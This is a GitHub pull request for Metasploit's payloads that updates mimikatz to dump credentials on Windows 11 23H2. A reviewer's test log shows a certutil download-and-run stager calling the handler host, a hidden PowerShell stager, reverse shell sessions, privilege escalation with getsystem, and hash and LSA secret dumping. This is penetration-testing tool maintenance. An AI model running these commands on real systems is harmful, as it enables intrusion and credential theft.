Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update mimikatz to 45c42c71 #698

Merged
merged 1 commit into from
Feb 20, 2024
Merged

Update mimikatz to 45c42c71 #698

merged 1 commit into from
Feb 20, 2024

Conversation

zeroSteiner
Copy link
Contributor

This pulls in changes from rapid7/mimikatz#12 to fix #697.

With these changes in place, credentials can be dump from Windows 11 23H2.

@b1gy7
Copy link

b1gy7 commented Feb 13, 2024
edited
Loading

Hi when will this commit get merged , does someone have an idea ? Big Thanks & Best regards

@cdelafuente-r7 cdelafuente-r7 self-assigned this Feb 13, 2024
@cdelafuente-r7 cdelafuente-r7 mentioned this pull request Feb 20, 2024
Merged
@cdelafuente-r7
Copy link
Contributor

Thanks @zeroSteiner. It looks good to me. I tested against Windows 11 23H2 and verified the kiwi extension loads and works as expected. I'll go ahead and land it.

Example output

  • x64 Meterpreter payload
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.120.1:4444

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > generate -f raw
certutil -urlcache -f http://192.168.120.1:8080/Qy-qOX10kZIXJGk3Q336Lg %TEMP%\mikKeNNxEM.exe & start /B %TEMP%\mikKeNNxEM.exe
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used

[*] Sending stage (264774 bytes) to 192.168.120.240
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.120.1:4444 -> 192.168.120.240:49805) at 2024-02-20 18:29:04 +0100

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN11PRO
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/elevator.x64.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > load kiwi
Loading extension kiwi...WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_kiwi.x64.dll is being used

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain    NTLM                              SHA1                                      DPAPI
--------  ------    ----                              ----                                      -----
n00tmeg   Win11Pro  <redacted>                        <redacted>                                <redacted>

kerberos credentials
====================

Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
n00tmeg    Win11Pro   (null)
win11pro$  WORKGROUP  (null)


meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN11PRO
<redacted>
  • x86 Meterpreter payload
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 192.168.120.1:4444
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > generate -f raw
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4)...[SNIP]...
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] Sending stage (176198 bytes) to 192.168.120.240
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 2 opened (192.168.120.1:4444 -> 192.168.120.240:49916) at 2024-02-20 18:32:24 +0100

msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > sysinfo
Computer        : WIN11PRO
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > load kiwi
Loading extension kiwi...WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_kiwi.x86.dll is being used

  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN11PRO
<redacted>

@cdelafuente-r7 cdelafuente-r7 merged commit 0ee45fa into rapid7:master Feb 20, 2024
17 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This pulls in changes from mimikatz upstream project to be able to dump credentials from Windows 11 23H2.

zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Feb 20, 2024
@zeroSteiner
Update metasploit-payloads gem to 2.0.166
b79790c 
Includes changes from:
* rapid7/metasploit-payloads#698
@zeroSteiner zeroSteiner mentioned this pull request Feb 20, 2024
Merged
errorxyz pushed a commit to errorxyz/metasploit-framework that referenced this pull request Feb 25, 2024
@zeroSteiner @errorxyz
Update metasploit-payloads gem to 2.0.166
64a4982 
Includes changes from:
* rapid7/metasploit-payloads#698
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
None yet
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Update Mimikatz
3 participants
@zeroSteiner @b1gy7 @cdelafuente-r7